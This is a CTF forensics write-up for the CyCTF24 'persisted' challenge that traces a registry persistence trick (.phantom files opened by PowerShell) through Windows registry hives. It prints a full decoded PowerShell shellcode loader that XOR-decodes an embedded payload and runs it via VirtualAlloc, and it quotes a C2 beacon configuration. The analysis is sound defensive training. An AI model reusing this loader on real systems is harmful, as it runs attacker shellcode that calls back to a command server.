Hello Forensics Geeks, I’m Ahmed Nasser (OxAlpha) and this is a simple Write-Up about persisted challenge from cyshield CTF (CyCTF24) enjoy…
You Can Download Challenge Files From here .
- We ware Provided with 6 Registry Hives :
- then i opened them with registry explorer
- First i checked RecentDocs key and found some suspicious file names usnder :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Phantom Files, also known as Hidden Game Files, are files that are purposely hidden or improperly titled by Rockstar Games, intended to disguise and hide myths from those viewing on their PC
- Then i used find tool to share about keyword “phantom” and got some hits :
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithProgids
- Then i checked the key i found that, phantom files is set to be opened with powershell 🤨🤨
Forensic Implications
If this association wasn’t intentionally configured, it could be a red flag indicating possible malicious behavior:
Automated Execution: Files with the .phantom extension could potentially trigger unwanted PowerShell commands.
Persistence Mechanism: This association could serve as a persistence mechanism for malware, ensuring that files with certain extensions trigger PowerShell.
- so i got the Reg key and file name :
KEY: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList
FileName: 1223.phantom
- Then i started to search about any attacker C2 IP and there are 2 method to get it :
First Method (Very easyyyyyyyyyyyyyy)
i was 100% sure it will be in encoded malicious payload (base64 , yep i just know it )
- so i used find tool to extract any base64 encoded payloads :
- this base64 payload found under :
HKCU\Software\Microsoft\GameApi
Second Method
- First i checked UserAssist key , and found that the attacker opened sticky notes 11 times.
The UserAssist key in the Windows Registry tracks user activity, specifically applications or files that have been accessed through the Windows GUI. It is commonly used in forensic investigations to gain insights into a user’s recent interactions with applications on a system.
The UserAssist keys are found under:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- so i went there to see what’s going on.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets
- So i known that the attacker edited this Reg Key , so i went there to see what’s going on.
- Nice I get it 🙃 Let’s decode :
S e t - S t r i c t M o d e   - V e r s i o n   2  
  
 f u n c t i o n   f u n c _ g e t _ p r o c _ a d d r e s s   {  
 	 P a r a m   ( $ v a r _ m o d u l e ,   $ v a r _ p r o c e d u r e ) 	 	  
 	 $ v a r _ u n s a f e _ n a t i v e _ m e t h o d s   =   ( [ A p p D o m a i n ] : : C u r r e n t D o m a i n . G e t A s s e m b l i e s ( )   |   W h e r e - O b j e c t   {   $ _ . G l o b a l A s s e m b l y C a c h e   - A n d   $ _ . L o c a t i o n . S p l i t ( ' \ \ ' ) [ - 1 ] . E q u a l s ( ' S y s t e m . d l l ' )   } ) . G e t T y p e ( ' M i c r o s o f t . W i n 3 2 . U n s a f e N a t i v e M e t h o d s ' )  
 	 $ v a r _ g p a   =   $ v a r _ u n s a f e _ n a t i v e _ m e t h o d s . G e t M e t h o d ( ' G e t P r o c A d d r e s s ' ,   [ T y p e [ ] ]   @ ( ' S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . H a n d l e R e f ' ,   ' s t r i n g ' ) )  
 	 r e t u r n   $ v a r _ g p a . I n v o k e ( $ n u l l ,   @ ( [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . H a n d l e R e f ] ( N e w - O b j e c t   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . H a n d l e R e f ( ( N e w - O b j e c t   I n t P t r ) ,   ( $ v a r _ u n s a f e _ n a t i v e _ m e t h o d s . G e t M e t h o d ( ' G e t M o d u l e H a n d l e ' ) ) . I n v o k e ( $ n u l l ,   @ ( $ v a r _ m o d u l e ) ) ) ) ,   $ v a r _ p r o c e d u r e ) )  
 }  
  
 f u n c t i o n   f u n c _ g e t _ d e l e g a t e _ t y p e   {  
 	 P a r a m   (  
 	 	 [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ T r u e ) ]   [ T y p e [ ] ]   $ v a r _ p a r a m e t e r s ,  
 	 	 [ P a r a m e t e r ( P o s i t i o n   =   1 ) ]   [ T y p e ]   $ v a r _ r e t u r n _ t y p e   =   [ V o i d ]  
 	 )  
  
 	 $ v a r _ t y p e _ b u i l d e r   =   [ A p p D o m a i n ] : : C u r r e n t D o m a i n . D e f i n e D y n a m i c A s s e m b l y ( ( N e w - O b j e c t   S y s t e m . R e f l e c t i o n . A s s e m b l y N a m e ( ' R e f l e c t e d D e l e g a t e ' ) ) ,   [ S y s t e m . R e f l e c t i o n . E m i t . A s s e m b l y B u i l d e r A c c e s s ] : : R u n ) . D e f i n e D y n a m i c M o d u l e ( ' I n M e m o r y M o d u l e ' ,   $ f a l s e ) . D e f i n e T y p e ( ' M y D e l e g a t e T y p e ' ,   ' C l a s s ,   P u b l i c ,   S e a l e d ,   A n s i C l a s s ,   A u t o C l a s s ' ,   [ S y s t e m . M u l t i c a s t D e l e g a t e ] )  
 	 $ v a r _ t y p e _ b u i l d e r . D e f i n e C o n s t r u c t o r ( ' R T S p e c i a l N a m e ,   H i d e B y S i g ,   P u b l i c ' ,   [ S y s t e m . R e f l e c t i o n . C a l l i n g C o n v e n t i o n s ] : : S t a n d a r d ,   $ v a r _ p a r a m e t e r s ) . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' )  
 	 $ v a r _ t y p e _ b u i l d e r . D e f i n e M e t h o d ( ' I n v o k e ' ,   ' P u b l i c ,   H i d e B y S i g ,   N e w S l o t ,   V i r t u a l ' ,   $ v a r _ r e t u r n _ t y p e ,   $ v a r _ p a r a m e t e r s ) . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' )  
  
 	 r e t u r n   $ v a r _ t y p e _ b u i l d e r . C r e a t e T y p e ( )  
 }  
  
 I f   ( [ I n t P t r ] : : s i z e   - e q   8 )   {  
 	 [ B y t e [ ] ] $ v a r _ c o d e   =   [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ' 3 2 u g x 9 P L 6 y M j I 2 J y Y n N x c n V r E v F G a 6 h x Q 2 u o c T t r q H E D a 6 h R c 2 s s l G l p b h L q a x L j j x 9 C X y E P A 2 L i 6 i 5 i I u L B z n F i c m u o c Q O o Y R 9 r I v N F o l s 7 K C F W U a i j q y M j I 2 u m 4 1 d E a y L z c 6 h r O 2 e o Y w N q I v P A d W v c 6 m K o F 6 t r I v V u E u p r E u O P Y u L q L m I i 4 h v D V t J v I G 8 H K 2 Y a 8 l b 7 e 2 e o Y w d q I v N F Y q g v a 2 e o Y z 9 q I v N i q C e r a y L z Y n t i e 3 1 6 e W J 7 Y n p i e W u g z w N i c d z D e 2 J 6 e W u o M c p s 3 N z c f k k j a p 1 U S k 1 K T U Z X I 2 J 1 a q r F b 6 r S Y p l v V A U k 3 P Z r E u p r E v F u E u N u E u p i c 2 J z Y p k Z d V q E 3 P b I U H l r q u J i m 3 M j I y N u E u p i c m J y S S B i c m K Z d K q 8 5 d z 2 y H p 4 a 6 r i a x L x a q r 7 b h L q c U s j I W O n c X F i m c h 2 D R j c 9 m u q 5 W u g 4 H N J K X x r q t J r q v l q 5 O P c 3 N z c b h L q c X F i m Q 4 l O 1 j c 9 q b j L K a + I i M j a 9 z s L K e v I i M j y P D K x y I j I 8 u B 3 N z c D G h P R m I j 9 s J 6 c j k d e K N D 2 z W e 0 2 2 v t F w f E j W 3 X 1 H i R Q y O q E i 6 W L b A V N a 0 Y z D m r I + v X 8 4 X Y H 7 R / i A q D r X A D q / M X o x e 0 8 G K M D e v + V 8 3 7 4 9 A 5 i N 2 U E Z R D m J E R k 1 X G Q N u T F l K T 0 9 C D B Y N E w M L Q E x O U 0 J X S k F P R h g D b n B q Z g M a D R M Y A 3 R K T U d M V F A D b X c D F Q 0 S G A N 3 U U p H R k 1 X D B Y N E x g D e 0 F M W w o u K S N y Z t r 1 B b m Z X B w f v T F 4 z y x V A X V 6 5 w I X D j D J g p b / l t L m z z N r B U 3 1 S h f / L 0 B z G N k S X K j h / y r U N E m a I z Q 6 9 t W W 1 F l b M t r 8 e b v a J a a o x J / j d L 5 A y n t k S d Y 1 c y 3 O 1 c U w s V T N y O G n R c 3 x l D U s 6 Q 1 u M 0 l c r f u B M O w g h p J 7 7 G E B c H p j j a 7 N E Y Q 7 v j C Z k l t T 1 + W U K z b v 5 E y e R u m 3 9 f K L w 8 A n h U 4 b q p n a 7 z V Q D U 9 p r W 9 T N 5 5 n Y s W P R 4 6 N 8 T v F h u U v C v M 9 j Y K X h G F q n W 3 s q X G 0 H o Q B g g 3 1 f X j o k T v U V S z i s h p V z R k j Y p 3 T l o F 1 3 P Z r E u q Z I y N j I 2 K b I z M j I 2 K a Y y M j I 2 K Z e 4 d w x t z 2 a 7 B w c G u q x G u q 0 m u q + W K b I w M j I 2 q q 2 m K Z M b W q w d z 2 a 6 D n A 6 b j V 5 V F q C R r I u C m 4 1 b 0 e 3 t 7 a y Y j I y M j c + D L v N 7 c 3 B I a E Q 0 S F R s N E h I V D R I R G i M Z / U u S ' )  
  
 	 f o r   ( $ x   =   0 ;   $ x   - l t   $ v a r _ c o d e . C o u n t ;   $ x + + )   {  
 	 	 $ v a r _ c o d e [ $ x ]   =   $ v a r _ c o d e [ $ x ]   - b x o r   3 5  
 	 }  
  
 	 $ v a r _ v a   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( ( f u n c _ g e t _ p r o c _ a d d r e s s   k e r n e l 3 2 . d l l   V i r t u a l A l l o c ) ,   ( f u n c _ g e t _ d e l e g a t e _ t y p e   @ ( [ I n t P t r ] ,   [ U I n t 3 2 ] ,   [ U I n t 3 2 ] ,   [ U I n t 3 2 ] )   ( [ I n t P t r ] ) ) )  
 	 $ v a r _ b u f f e r   =   $ v a r _ v a . I n v o k e ( [ I n t P t r ] : : Z e r o ,   $ v a r _ c o d e . L e n g t h ,   0 x 3 0 0 0 ,   0 x 4 0 )  
 	 [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : C o p y ( $ v a r _ c o d e ,   0 ,   $ v a r _ b u f f e r ,   $ v a r _ c o d e . l e n g t h )  
  
 	 $ v a r _ r u n m e   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( $ v a r _ b u f f e r ,   ( f u n c _ g e t _ d e l e g a t e _ t y p e   @ ( [ I n t P t r ] )   ( [ V o i d ] ) ) )  
 	 $ v a r _ r u n m e . I n v o k e ( [ I n t P t r ] : : Z e r o )  
 } 
Set-StrictMode -Version 2
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
If ([IntPtr]::size -eq 8) {
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJim3MjIyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDGhPRmIj9sJ6cjkdeKND2zWe022vtFwfEjW3X1HiRQyOqEi6WLbAVNa0YzDmrI+vX84XYH7R/iAqDrXADq/MXoxe08GKMDev+V83749A5iN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDe0FMWwouKSNyZtr1BbmZXBwfvTF4zyxVAXV65wIXDjDJgpb/ltLmzzNrBU31Shf/L0BzGNkSXKjh/yrUNEmaIzQ69tWW1FlbMtr8ebvaJaaoxJ/jdL5AyntkSdY1cy3O1cUwsVTNyOGnRc3xlDUs6Q1uM0lcrfuBMOwghpJ77GEBcHpjja7NEYQ7vjCZkltT1+WUKzbv5EyeRum39fKLw8AnhU4bqpna7zVQDU9prW9TN55nYsWPR46N8TvFhuUvCvM9jYKXhGFqnW3sqXG0HoQBgg31fXjokTvUVSzishpVzRkjYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIaEQ0SFRsNEhIVDRIRGiMZ/UuS')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
}
- so I saved this powershell script and upload it to Virus Total
{"C2Server": "http://192.168.116.129:80/KleA", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Xbox)\r\n"}
So the Final flag is :
CyCTF{HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList:1223.phantom:192.168.116.129:80}